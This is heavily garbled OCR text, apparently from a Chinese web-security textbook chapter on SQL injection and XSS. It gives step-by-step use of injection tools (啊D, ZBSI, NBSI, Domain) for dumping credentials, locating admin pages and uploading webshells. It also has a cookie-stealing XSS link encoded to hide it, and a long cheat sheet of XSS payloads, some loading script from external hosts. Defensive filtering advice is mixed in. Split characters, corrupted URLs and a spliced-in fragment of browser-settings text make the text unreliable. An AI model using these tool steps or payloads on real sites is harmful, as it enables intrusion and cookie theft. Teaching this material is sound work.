VB 编写 的 PHP 注入 辅助 工具 , 它 利 用 MySQL 的 load_file() 函 数 来 读 取 文件 。 

这 些 工具 大 部 分 都 采用 SQL 注入 漏洞 扫描 与 攻击 于 一 体 的 综合 利用 工具 ,可 以 帮助 攻 
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图 析 终 


悬 停 
国 为 了 页 上 的 按钮 和 控件 启用 视觉 样式 
下 载 完成 后 发 出 通知 

加 如 示 每 个 购 本 措 








加 存 Internet Explorer 玛 下 栏 和 “打开 ”对 话 框 中 人 
贺 在 后 台 加 载 站 点 和 内 容 以 优化 性 能 

在 文件 资源 管理 器 和 “运行 ”对 话 框 中 使 用 直接 插入 同 
转 到 地 址 栏 中 的 单字 条 目 对 应 的 Intranet 站 点 。 = 








1 
4 在 重新 启动 你 的 计算 机 后 生效 











重 置 Internet Explorer 六 
将 Internet Explorer 设置 重 置 为 默认 设置 。 


只 有 在 浏览 器 处 于 无 法 使 用 的 杖 态 时 ， 才 应 使 用 此 设置 。 
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图 7-26 IE 高 级 选项 设置 


击 迅速 完成 SQL 注入 点 寻找 与 数据 库 密码 破解 、 系 统 攻击 等 过 程 。 

2) 注入 辅助 工具 

由 于 某 些 网 站 可 能 会 采取 防范 措施 ,所 以 在 进行 SQL 注入 攻击 时 ,还 需要 借助 一 些 辅 
助 的 工具 来 实现 字符 转换 ,格式 转换 等 功能 。 常 见 的 SQL 注入 辅助 工具 有 “ASP 木马 C/S 
模式 转换 器 "和 “C2C 注入 格式 转换 器 ”。 

3) Web 木马 后 门 

Web 木马 后 门 是 用 于 注入 成 功 后 ,安装 在 网 站 服务 器 上 用 来 控制 一 些 特殊 的 木马 后 门 。 
常见 的 Web 木马 后 门 有 “ 冰 狐 浪子 ASP” 木 马 “ 海 阳 顶 端 网 ASP” 木 马 。 而 PHP 木马 后 门 
工具 有 黑客 之 家 PHP 木马 、.PHPSpy 等 ,主要 用 于 注入 攻击 后 控制 PHP 环境 的 网 站 服 
务 器 。 


PP 7.3.3 注入 攻击 实例 


利用 手工 进行 注入 攻击 具有 相当 大 的 难度 ,而 利用 一 些 注入 工具 进行 注入 攻击 就 简单 
得 多 。“ 啊 DD 注入 工具 ”就 是 一 款 出 现 相 对 较 早 、 功 能 非常 强大 的 SQL 注入 工具 ,利用 该 工 
具 可 以 进行 检测 旁 注 、 猜 解 SQL ,破解 密码 ,管理 数据 库 等 操作 。 











i. “ 啊 D 注入 工具 ”注入 实例 


“ 啊 DD 注入 工具 ”是 一 款 针 对 ASP 十 SQL 注入 的 工具 ,其 界面 和 功能 都 与 NBSI 工具 类 
似 ,利用 该 工具 可 以 检测 出 更 多 存在 注入 的 连接 。“ 啊 DD 注入 工具 ”使 用 多 线程 技术 ,大 大 提 
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高 检测 速度 。 它 主要 的 功能 有 跨 库 查询 .注入 点 扫描 、 管 理 入 口 检测 、 目 录 查 看 .CMD 命令 、 
木马 上 传 、 注 册 表 读 取 、 旁 注 /上 传 .WebShell 管理 .Cookies 修改 等 。 可 以 看 出 ,该 工具 是 集 
多 种 功能 于 一 身 的 综合 注入 工具 包 , 是 目前 黑客 运用 最 广泛 的 一 款 注 和 工具。 

通过 啊 D 注入 工具 可 以 检测 出 网 站 是 否 存在 注入 漏洞 ,还 可 以 对 存在 注入 漏洞 的 网 页 
进行 注入 。 具 体操 作 步 又 如 下 。 

(1) 下 载 并 运行 “ 啊 D 注入 工具 ”, 在 “注入 检测 ” 栏 中 单 击 “ 扫 描 注 入 点 ”按钮 , 即 可 打开 
“扫描 注入 点 ”窗口 。 在 “注入 连接 ”地 址 栏 中 输入 注入 的 网 站 地 址 , 单 击 “ 检 测 ” 按 钮 , 即 可 打 
开 该 网 站 并 扫描 注入 点 个 数 。 

(2) 若 单 击 “ 注 入 连接 ” 右 侧 的 按钮 , 即 可 对 Cookies 进行 修改 。 根 据 需要 选择 其 中 的 一 
个 注入 点 , 单 击 “ 注 入 检测 ”选项 栏 下 方 的 “SQL 注入 检测 ”按钮 , 即 可 进入 “SQL 注入 检测 ” 
页 面 。 单 击 “ 检 测 ” 按 钮 ,等 待 检测 完成 后 ,继续 单 击 “ 检 测 表 段 "按钮 , 即 可 检测 出 相应 的 表 
段 ,如 图 7-27 所 示 。 
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7-27 对 数据 表 的 表 段 进行 检测 


(3) 再 任意 选择 其 中 的 一 个 表 段 , 单 击 右边 的 “检测 字段 ?按钮 , 即 可 检测 出 该 表 对 应 的 

应 字段 。 根 据 需 要 选择 该 表 中 的 所 有 字段 . 单 击 “检测 内 容 ” 按 钮 . 即 可 开始 检测 内 容 。 

(4) 待 内 容 检测 完毕 后 ,在 “检测 内 容 ” 下 方 的 列表 框 中 , 即 可 查看 详细 的 检测 内 容 , 包 
括 用 户 名 、 密 码 ,编号 等 ,如 图 7-28 所 示 。 

(5) 在 “ 啊 D 注 入 工具 ” 主 窗口 中 单 击 “ 管 理 入 口 检测 ”按钮 , 即 可 打开 “检测 管理 入 口 ” 
窗口 。 在 “网 站 地 址 "栏目 中 输入 需要 检测 的 管理 入 口 地 址 , 单 击 “ 检 测 管理 入 口 ” 按 钮 , 即 可 
在 下 方 列表 中 显示 该 网 站 的 所 有 登录 入 口 点 ,如 图 7-29 所 示 。 
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图 7-28 查看 详细 的 检测 内 容 








ep://Uebe buidu eon 














可 用 连接 和 目录 位 置 

A Mttpi// hisbe baidu eon/. .1adainydafanlt asp 
http //tisbe bsita con/count/ 

http:// tieba baita coa/DataBecimp/ 

| 鳄 http: /ti 


Mttpi// tisbe bsita coa/earesrfocaz/Legin asp 
http //tiebs bai da con/Ny-login ssp 

http 1/tieba baidu con/VploadFile/ 
http'//tisba baidu con/nanager/adnin asp 


A httpi//tisbe baiaa con/denglu asp 
Mtpi// tisbe baidu con/soft_sdnin jsp 
A Mtpi// licbe baida con/webadain ssp 


http://tisbe buidu con/123_adnin ssp 
http://tisbe baidu eon/soft_adnin. sspx 

A http://tisbe baidu cen/adninin azp 
http://tisbe baidu con/adnin body. ass 
httpi//tiebe bai da con/a_adnin. ssp 

A Mtp: /ftieba baidu con/nenage/login asp 
A http://tieba baidu coa/legin/Detanlt asp? 
Af Mtp'//tieba baidu coa/hdnin_ SoftLink asp 


























图 7-29 ”检测 网 址 的 管理 入 口 
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(6) 在 “可 用 连接 和 目录 位 置 " 列 表 处 右 击 要 打开 的 网 址 ,在 快捷 菜单 中 选择 “用 IE 打 
开 连 接 ” 选 项 , 则 在 IE 浏览 器 中 打开 该 网 页 。 这 样 ,黑客 就 可 以 用 猜 解 出 来 的 管理 员 账 号 和 
密码 尝试 着 进入 该 网 站 后 台 管 理 页 面 。 

(7) 在 “相关 工具 ”栏目 中 单 击 “ 目 录 查 看 ”按钮 ,输入 要 注入 的 网 站 地 址 并 单 击 “ 检 测 ” 
按钮 ,选择 要 检测 的 目标 磁盘 并 单 击 “开始 检测 ?按钮 ,可 以 查看 网 站 的 物理 目录 。 在 “相关 
工具 ”栏目 中 单 击 *CMD/ 上 传 " 和 “注册 表 读 取 ” 等 按钮 ,可 进行 相关 操作 。 

(8) 单 击 “设置 ?选项 中 的 “设置 "按钮 ,可 对 SQL 的 管理 入口、 表 段 .字段 等 内 容 进行 设 
置 , 也 可 以 添加 一 些 自己 要 检测 的 内 容 。 因 为 有 些 需要 猜 解 的 表 名 或 字段 只 能 在 这 里 自 
定义 。 

一 般 来 说 ,要 防御 此 类 注 和 人 只 需要 在 设计 数据 库 时 ,把 数据 的 表 段 名 .字段 名 等 设置 为 
陌生 的 名 称 ,这 样 , 啊 DD 等 注入 工具 就 失效 了 。 


12. 使 用 ZBSI 检测 PHP 脚本 


由 于 PHP 十 MySQL 网 站 具有 安全 系数 较 高 .访问 速度 较 快 . 易 用 性 好 、 价 格 较 便 宜 等 
优点 ,目前 很 多 中 小 型 企 事业 单位 都 采用 这 种 模式 创建 网 站 ,这 类 网 站 也 成 为 黑客 攻击 的 
对 象 。 

PHP 注入 攻击 是 现今 比较 流行 的 注入 攻击 方式 ,依靠 它 强 大 的 灵活 性 吸引 了 广大 黑 
客 。PHP 注入 也 分 为 两 种 , 即 手工 注入 和 使 用 工具 注入 。 

现在 可 用 于 PHP 注入 的 工具 很 多 ,ZBSI 就 是 其 中 之 一 。ZBSI 是 一 款 经 典 的 PHP 注 
入 辅助 工具 ,使 用 该 工具 可 以 检测 PHP 网 站 中 是 否 存在 注入 漏洞 以 及 字段 数目 ,还 可 以 将 
其 作为 浏览 器 打开 指定 的 网 页 。 由 于 目前 PHP 注入 漏洞 普遍 存在 ,并 且 开 发 出 很 多 优秀 的 
注入 工具 ,例如 ZBSI 和 CASI。 这 可 以 让 黑客 避免 了 自己 手工 进行 猜 解 , 从 而 大 大 提高 了 和 人 
侵 的 成 功率 。 

使 用 ZBSI 检测 注 入 点 ,具体 操作 步骤 如 下 。 

(1) 用 下 浏览 器 打开 搜索 引擎 ,在 搜索 框 中 输入 "php? id 一 ”, 单 击 * 搜 索 ? 按 钮 , 即 可 看 
到 所 有 网 址 含有 中 “php? id 二 ”的 网 页 。 

(2) 下 载 并 运行 ZBSI V1.0, 运 行 其 中 的 “ZBSI V1. 0[PHP 注入 工具 ]. exe” 应 用 程序 ， 
即 可 打开 “ZBSI V1. 0[PHP 注入 工具 ]” 主 窗口 。 

(3) 在 “注入 地 址 ?文本 框 中 输入 搜索 到 的 网 址 , 单 击 * 检 测 注 入 "按钮 , 即 可 对 其 检测 。 
待 检测 完毕 后 ,将 会 显示 该 网 站 是 否 可 以 进行 PHP 注 入。 

(4) 在 ZBSI 中 还 可 以 对 得 到 字段 的 数目 进行 检测 . 单 击 “ 字 有 段 数目 "按钮 , 即 可 看 到 “ 猜 
解 得 到 的 字段 数目 ”对 话 框 。 单 击 “ 检 测 注入 ”按钮 , 即 可 在 “ZBSI V1. 0[PHP 注入 工具 ]” 主 
窗口 中 看 到 含有 猜 解 到 字段 的 网 址 ,如 图 7-30 所 示 。 

(5) ZBSI 还 附带 有 浏览 器 功能 .在 “ZBSI V1. 0[PHP 注入 工具 ]” 主 窗口 的 “网 站 地 址 ” 
文本 框 中 输入 要 浏览 的 网 页 地 址 后 . 单 击 “浏览 ?按钮 , 即 可 浏览 相应 的 网 页 。 

在 各 种 黑客 横行 时 ,如 何 实现 自己 PHP 代码 安全 ,并 保证 程序 和 服务 器 的 安全 ,是 一 个 
很 重要 的 问题 。 在 编写 PHP 代码 时 ,对 变量 进行 初始 化 和 过 滤 , 可 以 有 效 防御 PHP 注入 。 
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图 7-30 得 到 含有 猜 解 到 字段 的 网 址 


ls. 其 他 工具 


1) Domain 注入 工具 

Domain 是 一 款 功能 非常 强大 的 SQL 注入 工具 ,该 工具 具有 WHOIS 查询 、 上 传 页 面 批 
量 检测 、shell 上 传 数 据 库 浏览 及 加 密 解密 等 功能 。 利 用 该 工具 可 以 进行 旁 注 检测 、 综 合 上 
传 .SQL 注入 检测 ,数据库 管 理 等 操作 。 而 虚拟 主机 域名 查询 、 二 级 域名 查询 .整合 读 取 、 修 
改 Cookies 功能 比较 适合 初级 用 户 。 

Domain 主要 有 旁 注 检测 \ 综 合 上 传 .SQL 注入 检测 ,数据库 管 理 , 破 解 工具 及 辅助 工具 
6 个 模块 ,而 且 该 工具 的 每 个 模块 都 有 许多 小 功能 。 另 外 该 工具 中 每 个 检测 功能 都 采用 多 
线程 技术 。Domain 工具 中 各 个 模块 的 具体 作用 如 下 。 

(1) 旁 注 检测 模块 : 该 模块 包括 虚拟 主机 域名 查询 、 二 级 域名 查询 、 整 站 目录 扫描 、 网 站 
批量 扫描 、 自 动 检测 网 站 排名 、 自 动 读 取 \ 修 改 Cookies 自动 检测 注入 点 等 多 个 子 功 能 ,而 且 
最 新 版 本 对 该 模块 大 部 分 功能 已 做 了 优化 。 

(2) 综合 上 传 模块 : 综合 上 传 模块 包括 动 网 论坛 上 传 漏洞 .动力 上 传 漏洞 动感 购物 商 
城 、 乔 客 上 传 漏洞 ,以 及 自 定义 上 传 等 功能 。 

(3) SQL 注入 检测 模块 : SQL 注入 模块 可 以 对 一 个 或 多 个 网 站 进行 批量 扫描 注入 点 、 
SQL 注入 猜 解 检测 .MSSQL 辅助 工具 、 管 理 和 人口 扫描 、 检 测 设置 区 等 操作 。 其 中 批量 扫描 
注入 点 可 以 对 一 个 或 多 个 网 址 进行 检测 。SQL 注入 检测 模块 虽然 新 增 功能 不 太 多 ,但 是 在 
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功能 新 颖 和 速度 上 有 所 突破 。 

(4) 数据 库 管理 功能 : 在 Domain 工具 中 还 可 以 对 已 经 存在 的 各 种 数据 库 进 行 管理 ,如 
新 建 和 浏览 数据 库 ,新建 表 及 字段 .压缩 数据 库 、 修 改 数据 库 密 码 查询 记录 、 复 制 数 据 库 、 增 
加 及 删除 记录 等 。 

(5) 破解 工具 : 利用 Domain 中 自 带 的 破解 工具 可 以 破解 出 MD5 密 文 和 Serv-U 密码 
等 ,还 可 以 破解 出 Access 数据 库 密 码 和 PCanywhere 密码 。 

(6) 辅助 工具 : 在 Domain 中 自 带 的 辅助 工具 包括 BBSXP 最 新 利用 程序 .BBSXP 暴 库 
工具 .PHPwind2. 利用 程序 .OfStar 论坛 利用 程序 、L-blog 漏洞 利用 程序 及 PHPBB 论坛 录 
用 程序 等 ,利用 这 些 工具 可 以 攻击 相应 的 网 站 。 

2) NBSI 注入 工具 

NBSI 注入 工具 也 是 黑客 经 常 使 用 的 注入 工具 ,利用 该 工具 可 以 对 各 种 注入 漏洞 进行 解 
码 , 从 而 提高 猜 解 效率 。NBSI 被 称 作 网 站 漏洞 检测 工具 ,是 一 款 ASP 注入 漏洞 检测 工具 ， 
在 SQL Server 注入 检测 方面 有 极 高 的 准确 率 。 

NBSI( 网 站 安全 漏洞 检测 工具 ,又 叫 SQL 注入 分 析 器 ) 是 一 套 高 集成 性 Web 安全 检测 
系统 ,是 由 NB 联盟 编写 的 一 个 非常 强 的 SQL 注入 工具 。 经 长 时 间 的 更 新 优化 ,在 ASP 程 
序 漏洞 分 析 方 面 已 经 远 远 超越 于 同类 产品 。NBSI 分 为 个 人 版 和 商业 版 两 种 ,个 人 版 只 能 检 
测 出 一 般 网 站 的 漏洞 ,而 商业 版 则 没有 完全 限制 , 且 其 分 析 范 围 和 准确 率 都 所 有 提升 。 

利用 网 站 程序 漏洞 结合 注入 利器 NBSI 可 以 获取 会 员 账 号 和 管理 员 账号 ,从 而 就 可 以 
获取 整个 网 站 的 Webshell ,然后 可 通过 开启 Telnet 和 3389 端口 来 攻击 该 网 站 服务 器 。 


PP 7.3.4 SQL 注入 攻击 防范 


由 于 SQL 注入 攻击 具有 很 大 的 危害 性 ,现在 已 经 严重 影响 到 网 站 的 安全 ,所 以 必须 防 
御 SQL 注入 漏洞 的 存在 。 在 防御 SQL 注入 攻击 时 ,网 站 程序 员 必 须要 注意 可 能 出 现 安全 
漏洞 的 地 方 , 主 要 是 用 户 输入 数据 的 页 面 。 


Li. 对 用 户 输 入 的 数据 进行 过 滤 


目前 引起 SQL 注入 的 原因 是 程序 员 在 创建 网 站 时 对 特殊 字符 不 完全 过 滤 。 其 原因 还 
是 因为 程序 员 没 有 足够 的 脚本 安全 意识 或 考虑 不 周 。 常 见 的 过 滤 方 法 有 基础 过 滤 、 二 次 过 
滤 以 及 SQL 通用 防 注 人 程序 等 多 种 方式 。 

1) 基础 过 滤 与 二 次 过 滤 

在 进行 SQL 注入 攻击 前 ,需要 在 可 修改 参数 中 提交 ' .and 等 特殊 字符 判断 是 否 存在 
SQL 注入 漏洞 ; 而 在 进行 SQL 注入 攻击 时 ,需要 提交 包含 ; -、update、select 等 特殊 字符 的 
SQL 注入 语句 。 所 以 要 防范 SQL 注入 攻击 , 则 需要 在 用 户 输入 或 提交 变量 时 ,可 对 这 些 特 
殊 字符 进行 转换 或 过 滤 , 这 样 才 可 以 在 很 大 程度 上 避免 SQL 注入 漏洞 的 存在 。 

下 面 是 一 个 ID 变量 的 过 滤 性 语句 。 





if instr(request("id"),",")>0 or instr(request("id"),"insert")>0 or 
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instr(request("id"),";")>0 
then response. write(" 
< Script language = javascript > 
javascript:history.go( — 1); 
</Script >") 
response. end( ); 
end if 
上 面 代码 作用 是 过 滤 ID 参数 中 的 ";”,” 和 insert。 如 果 在 ID 参数 中 包含 有 这 几 个 字 
符 , 则 会 返回 错误 页 面 。 但 危险 的 字符 远 不 止 这 几 个 ,如 果 要 过 滤 其 他 字符 ,只 须 将 危害 字 
符 加 到 上 面 的 代码 中 即 可 。 通 常情 况 下 ,在 获得 用 户 提 交 的 参数 时 ,首先 要 进行 基础 性 的 过 
滤 , 然 后 再 根据 程序 相应 的 功能 以 及 用 户 输入 的 数据 进行 二 次 过 滤 。 
2) 在 PHP 中 对 参数 进行 过 滤 
与 ASP 注入 相 比 ,PHP 注入 的 难度 比较 大 ,同样 在 PHP 中 防御 SQL 注入 要 相对 容易 
一 些 。 可 以 利用 PHP 网 站 中 配置 文件 php. ini 来 对 PHP 站 点 进行 安全 设置 。 打 开 php. ini 
文件 的 安全 模式 ,分 别 设置 safe_mode 二 on 和 display_errors 二 off。 因 为 如 果 显 示 PHP 执 
行 错误 信息 的 display_errors 属性 是 on 的 话 ,就 会 返回 很 多 信息 ,这 样 黑客 就 可 以 利用 这 些 
信息 进行 攻击 。 
另外 ,该 文件 还 有 一 个 重要 的 属性 magic_quotes_gpc, 如 果 将 其 设置 为 on,PHP 网 站 就 
会 自动 将 提交 含有 '、\ 等 特殊 字符 的 数据 转换 为 含有 反 斜 线 的 转 义 字符 。 该 属性 与 ASP 
中 参数 的 过 滤 非 常 类 似 , 它 可 以 防御 大 部 分 字符 型 注入 攻击 。 
3) 使 用 SQL 通用 防 注 入 程序 进行 过 滤 
通过 手工 的 方法 对 特殊 字符 进行 过 滤 难 免 会 留 下 过 滤 不 严 的 漏洞 ,而 使 用 “SQL 通用 
防 注入 程序 ”就 可 以 对 程序 进行 全 面 的 过 滤 , 从 而 避免 存在 SQL 脚本 注入 漏洞 。 一 般 是 把 
防 注入 脚本 包含 到 相关 脚本 文件 中 。 例 如 ,代码 二 ! 一 # include file 一 "Neeao_SqlIn. Asp"->， 
就 可 以 在 任意 页 面 中 调用 防 注 入 程序 。 


12. 使 用 专业 的 漏洞 扫描 工具 进行 扫描 


还 可 以 利用 一 些 专业 的 漏洞 扫描 工具 来 扫描 网 站 中 存在 的 漏洞 ,如 Acunetix 的 Web 漏 
洞 扫描 程序 。 一 个 完善 的 漏洞 扫描 程序 可 以 专门 查找 网 站 上 的 SQL 注入 式 漏洞 。 





上 3. 对 重要 数据 进行 加 窜 


采用 加 密 技术 对 网 站 中 重要 的 数据 进行 加 密 , 如 用 MD5 加 密 ,MD5 没有 反 向 算法 ,也 
不 能 解密 ,就 可 以 防范 注入 攻击 对 网 站 的 威胁 。 


j* 7.3.5 XSS 攻击 


XSS 攻击 是 指 跨 站 脚本 攻击 (Cross Site Scripting) ,为 不 和 层 冯 样式 表 (Cascading Style 
Sheets,CSS) 的 缩写 混淆 , 故 将 跨 站 脚本 攻击 缩写 为 XSS。 
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Li XSS 的 原理 


XSS 是 一 种 经 常 出 现在 Web 应 用 中 的 计算 机 安全 漏洞 , 它 允 许 恶意 Web 用 户 将 代码 
植 人 到 提供 给 其 他 用 户 使 用 的 页 面 中 。 比 如 这 些 代码 包括 HTML 代码 和 客户 端 脚本 。 攻 
击 者 利用 XSS 漏洞 旁 路 掉 访问 控制 一 -如同 源 策略 (Same Origin Policy)。 这 种 类 型 的 漏 
洞 由 于 被 黑客 用 来 编写 危害 性 更 大 的 网 络 钓 鱼 (Phishing) 攻 击 而 变 得 广为人知 。 对 于 跨 站 
脚本 攻击 ,黑客 界 共识 是 跨 站 脚本 攻击 是 新 型 的 “缓冲 区 溢出 攻击 ”, 而 JavaScript 是 新 型 的 
ShellCode。 

与 主动 攻击 Web 服务 器 端的 SQL 注入 攻击 不 同 ,XSS 攻击 发 生 在 浏览 器 客户 端 ,对 服 
务 器 一 般 没有 直接 危害 ,而 且 总 体 上 属于 等 待 对 方 上 钩 的 被 动 攻击 ,因此 XSS 这 种 安全 漏 
洞 虽 很 早 就 被 发 现 ,其 危害 性 却 曾经 受到 普遍 忽视 ,但 随 着 网 络 攻 击 者 挖掘 出 了 越 来 越 多 的 
XSS 漏洞 利用 方式 ,加 上 客户 端 脚本 的 流行 ,使 得 黑客 有 了 更 多 机 会 发 动 XSS 攻击 ,导致 近 
年 来 XSS 攻击 的 安全 事件 层出不穷 ,人 们 对 XSS 攻防 方面 研究 的 重视 程度 明显 提高 。 

JavaScript 可 以 用 来 获取 用 户 的 Cookie\ 改 变 网 页 内 容 `URL 跳 转 ,那么 存在 XSS 漏洞 
的 网 站 ,就 可 以 盗 取 用 户 Cookie、 黑 掉 页 面 .导航 到 恶意 网 站 。 

通常 使 用 二 script src 二 "http:// 外 部 网 站 /x. txt" 二 二 /script 二 方式 来 加 载 外 部 脚本 ， 
而 在 x. txt 中 就 存放 着 攻击 者 的 恶意 JavaScript 代码 ,这 段 代 码 可 能 是 用 来 盗 取 用 户 的 
Cookie, 也 可 能 是 监控 键盘 记录 等 恶意 行为 。 备 注 : JavaScript 加 载 外 部 的 代码 文件 可 以 是 
任意 扩展 名 (无 扩展 名 也 可 以 ) 。 


12. XSS 攻击 方式 


根据 XSS 跨 站 脚本 攻击 存在 的 形式 及 产生 的 效果 ,可 以 将 其 分 为 以 下 3 类 。 

1) 反射 型 XSS 跨 站 脚本 攻击 

反射 型 XSS 脚本 攻击 只 是 简单 地 将 用 户 输入 的 数据 直接 或 不 经 过 严格 安全 过 滤 就 在 
浏览 器 中 进行 输出 ,导致 输出 的 数据 中 存在 可 被 浏览 器 执行 的 代码 数据 。 

反射 型 XSS 也 被 称 为 非 持 久 性 XSS, 是 现在 最 容易 出 现 的 一 种 XSS 漏洞 。 由 于 此 种 类 
型 的 跨 站 攻击 代码 存在 于 URL 中 .所 以 黑客 通常 需要 通过 诱骗 或 加 密 变 形 URL 等 方式 ,将 
恶意 代码 的 链接 发 给 用 户 , 只 有 用 户 单 击 以 后 才能 使 得 攻击 成 功 实施 。 

2) 存储 型 XSS 跨 站 脚本 攻击 

存储 型 XSS 跨 站 脚本 攻击 也 称 为 持久 型 XSS 攻击 ,是 指 Web 应 用 程序 会 将 用 户 输入 的 数 
据 信 息 保存 在 服务 端的 数据 库 或 其 他 文件 形式 中 ,网 页 进行 数据 查询 展示 时 ,会 从 数据 库 中 获 
取 数 据 内 容 , 并 将 数据 内 容 在 网 页 中 进行 输出 展示 ,因此 存储 型 XSS 具有 较 强 的 稳定 性 。 

存储 型 XSS 是 最 危险 的 一 种 跨 站 脚本 。 最 为 常见 的 场景 就 是 在 博客 或 新 闻 发 布 系统 
中 ,黑客 将 包含 有 恶意 代码 的 数据 信息 直接 写 入 文章 或 文章 评论 中 ,所 有 浏览 文章 或 评论 用 
户 ,都 会 在 他 们 客户 端 浏览 器 环境 中 执行 插入 的 恶意 代码 。 

3) 基于 DOM 的 XSS 跨 站 脚本 攻击 

基于 DOM(Document Object Model, 文 档 对 象 模型 ) 的 XSS 是 不 需要 与 服务 器 交互 的 ， 
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它 只 发 生 在 客户 端 处 理 数据 阶段 。 这 种 利用 也 需要 受害 者 单 击 链接 来 触发 ,DOM 型 XSS 
是 前 端 代码 中 存在 了 漏洞 ,而 反射 型 是 后 端 代 码 中 存在 了 漏洞 。 

反射 型 和 存储 型 XSS 是 服务 器 端 代 码 漏 洞 造成 的 , payload 在 响应 页 面 中 ,在 DOM 
XSS 中 ,payload 不 在 服务 器 发 出 的 http 响应 页 面 中 , 当 客 户 端 脚本 运行 时 ( 泻 染 页 面 时 )， 
payload 才 会 加 载 到 脚本 中 执行 。 


1a. XSS 检测 


检测 XSS 一 般 分 为 两 种 方式 : 一 种 是 手动 检测 ; 另 一 种 是 自动 检测 。 手 动 检测 结果 精 
准 ; 对 于 较 大 的 Web 应 用 程序 ,应 用 自动 检测 的 方式 则 更 实际 ,但 存在 误 报 和 漏 报 。 

1) 手动 检测 

可 得 知 输出 位 置 的 情况 ,需要 考虑 哪里 有 输入 、 输 入 的 数据 在 什么 地 方 输出 。 选 择 有 特 
殊 意 义 的 字符 ,这 样 可 以 快速 测试 是 否 存在 XSS, 如 二、 > ”、、(C、)。 

对 于 无 法 得 知 输出 位 置 的 情况 ,如 用 户 提 交 的 内 容 不 会 马上 显示 在 网 站 中 , 则 需要 管理 
员 审 核 。 

在 二 div 之 标签 中 : 二 div 之 XSS Test 一 /div 二 。 

在 二 input 二 标签 中 : 一 input type 一 "text" name 一 "content" value 一 "XSS Test"/ 二 。 

对 于 这 种 情况 ,通常 会 采用 输入 "/ 二 XSS Test 来 测试 。 

2) 自动 检测 

专门 的 XSS 扫描 工具 有 XSSER、XSSF 等 。 


和 4. XSS 攻击 示例 


(1) 下 面 的 ASP 代码 是 获得 name 的 值 .并 在 网 页 上 显示 出 来 。 
<% Response. Write(Request. Querystring( "name")) %> 

如 果 传 人 的 name 的 值 为 

< script >x= document. cookie;alert(x);</script > 


就 可 以 直接 盗 取 用 户 的 cookie。 用 下 面 的 方式 发 送 一 条 链接 地 址 给 其 他 用 户 去 单 击 , 则 没 
有 隐蔽 性 。 

虽然 前 面 的 xxx. com 瞒 过 了 少数 人 ,但 大 多 数 人 可 以 辨认 出 后 面 的 JavaScript 代码 ,所 
以 ,需要 将 后 面 的 JavaScript 代码 转换 成 URL 的 十 六 进 制 ,内 容 如 下 。 

http://www. xxx. com/reg. asp?name = < script>x= document. cookie;alert(x);</script > 

http://www. xxx. com/reg. asp?name = 3C%73%63%72%69%70% 74% 3E% 78% 3D% 64% 6F% 63% 


75%6D%65%6E% "74% 2E% 63% 6F% 6F% 6B%S 6909%65% 3B% 61% 6C% 65% 72% 74% 28% 78% 29% 
3B% 3C%2F%73%63%72%69%70%74%3E 


(2) 在 没有 XSS 防范 的 网 站 的 搜索 框 输入 以 下 代码 ,可 在 原 网 页 下 嵌入 百度 的 首页 。 


"/><div style = "position:absolute; left:0px; top:0px;"> 


@— 
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< iframe src = "http://www. baidu. com" FRAMEBORDER= 0 width = 1000 height = 900/></div><a href =" 
(3) 简单 理解 DOM XSS 就 是 出 现在 javascript 代码 中 的 xss 漏洞 。 


<script> 
var temp = document. URL; // 获 取 URL 
var index = document. URL. indexOf("content = ") +47 
var par = temp. substring( index); 
document. write(decodeURI(par)); // 输 入 获取 内 容 
</script > 


如 果 输 入 http://www. X X X. com/dom. html? content = <script > alert (/xss/) 
去 /script> ,就 会 产生 XSS 漏洞 。 
(4) 在 某 网 站 输入 参数 X x X ,发 现 参数 XXX 原样 地 出 现在 了 页 面 源码 中 。 


< input type = "text" class = "Seach" name= "w" value="X x Xx"/> 


那 就 可 以 进行 XSS 攻击 了 ,将 X x XX 替换 为 输入 : abc"/ 二 二 script 二 alertC'haha') 一 / 
script 二 一 a href 一 " ,返回 的 HTML 代码 如 下 。 


< input type = "text" class = "Seach" name = "w" value = "abc"/> 
< script > alert('haha')</script><! --"”/> 


这 样 , 一 script alert('haha') 一 /script 二 被 执行 了 。 这 里 再 举 一 些 XSS 攻击 行为 的 
例子 。 


< IMG SRC = "javascript:alert( 'XSS');"> 

< IMG SRC = javascript:alert( 'XSS')> 

< IMG SRC = "javascript:alert(String. fromCharCode( 88, 83,83))"> 
< IMG SRC = "javascript:alert( 'XSS');"> 

< SCRIPT/XSS SRC = "http://example. com/xss. js"></SCRIPT > 

<< SCRIPT > alert("XSS" ) ; //<</SCRIPT> 

< iframe src = http://example. com/scriptlet.html < 

< INPUT TYPE = "IMAGE”SRC = "javascript:alert('XSS');"> 

< BODY BACKGROUND = "javascript:alert('XSS') "> 

< BODY ONLOAD = alert (document. cookie)> 

<BODY onload! # $ %&()*~+-_.,:;?@[/|"]~=alert("Xss")> 

< IMG DYNSRC = "javascript:alert( 'XSS')"> 

< IMG DYNSRC = "javascript:alert( 'XSS')"> 

<BR SIZE = "&{alert( 'XSS')}"> 

< IMG SRC = 'vbscript:msgbox( "XSS")'> 

< TABLE BACKGROUND = "javascript:alert("XSS') "> 

<DIV STYLE = "width: expression(alert('XSS'));"> 

<DIV STYLE = "background — image: url(javascript:alert( 'XSS'))"> 
< STYLE TYPE = "text/javascript"> alert( 'XSS') ;</STYLE > 

< STYLE type = "text/css"> BODY{background:url("javascript:alert( 'XSS')")}</sTYLE> 
<? = '< SCRIPT > alert("XSS")</SCRIPT>'?> 

<A HREF = "javascript:document. location = 'http://www. example. com/'"> XSS </A> 
< IMG SRC = javascript:alert( 'XSS')> 
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< EMBED SRC = "http://ha. ckers. org/xss. swf" AllowScriptAccess = "always"></EMBED > 
a= "get"; 

b= "URL("™""; 

c= "javascript:"; 

d= "alert( 'XSS');"")"; 

eval(a+b+c+d); 


7.4 Web 浏览 器 的 安全 性 


据 国 外 媒体 报道 ,浏览 器 是 人 们 上 网 冲浪 的 必 备 工具 。 巾 于 浏览 器 的 功能 .体积 趋 于 庞 
大 ,许多 恶意 程序 制造 者 也 把 目光 瞄准 了 浏览 器 产品 。 

在 最 新 的 安全 性 测试 中 ,主要 浏览 器 都 被 发 现存 在 许多 安全 漏洞 。 为 此 ,浏览 器 厂商 都 
会 提供 各 种 安全 功能 ,主要 包括 : 不 明 网 站 拦截 、 恶 意 代 码 检 测 、 反 钓鱼 攻击 等 。 


> 7.4.1 浏览 器 本 身 的 漏洞 


在 2016 年 9 一 10 月 ,NSS Labs 对 目前 市 场 中 的 主流 浏览 器 进行 了 防 恶 意 软件 和 钓鱼 
攻击 的 测试 。 此 次 ,针对 Google Chrome(Version 53. 0. 2785) Mozilla Firefox( Version 48. 0. 2) 
以 及 Microsoft Edge(Version 38. 14393. 0. 0) 三 款 主流 浏览 器 进行 了 安全 测试 。 

